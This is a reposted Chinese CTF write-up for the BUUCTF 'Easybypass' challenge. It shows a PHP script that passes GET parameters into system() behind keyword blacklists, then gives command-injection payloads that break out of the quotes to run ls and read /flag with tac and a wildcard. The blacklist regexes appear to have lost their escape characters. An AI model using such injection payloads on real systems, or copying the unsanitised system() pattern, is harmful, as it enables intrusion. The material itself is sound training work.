EasyBypass
highlight_file(__FILE__);
$comm1 = $_GET['comm1'];
$comm2 = $_GET['comm2'];
if(preg_match("/'|`|\|*|n|t|xA0|r|{|}|(|)|<|&[^d]|@|||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1))
$comm1 = "";
if(preg_match("/'|"|;|,|`|*|\|n|t|r|xA0|{|}|(|)|<|&[^d]|@|||ls|||tail|more|cat|string|bin|less||tac|sh|flag|find|grep|echo|w/is", $comm2))
$comm2 = "";
$flag = "#flag in /flag";
$comm1 = '"' . $comm1 . '"';
$comm2 = '"' . $comm2 . '"';
$cmd = "file $comm1 $comm2";
system($cmd);
老规矩,先去掉过滤本地测试
?comm1=/etc/passwd
&comm2=/var/www/html/11.php";"ls
去掉过滤后可以成功执行,那思路基本是这样了
comm1过滤的少,我们从这里下手
?comm1=index.php";tac index.php;"
&comm2=1
?comm1=index.php";tac /fla?;"
&comm2=1
ok了…
原文来自CSDN博主「N0Tai1学习又咕了」|侵删
![[BUUCTF]Easybypass-解题步骤详解 [BUUCTF]Easybypass-解题步骤详解](https://cn-sec.com/wp-content/uploads/2022/04/8-1651140067.png)
![[BUUCTF]Easybypass-解题步骤详解 [BUUCTF]Easybypass-解题步骤详解](https://cn-sec.com/wp-content/uploads/2022/04/0-1651140069.png)
原文始发于微信公众号(寰宇卫士):[BUUCTF]Easybypass-解题步骤详解
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论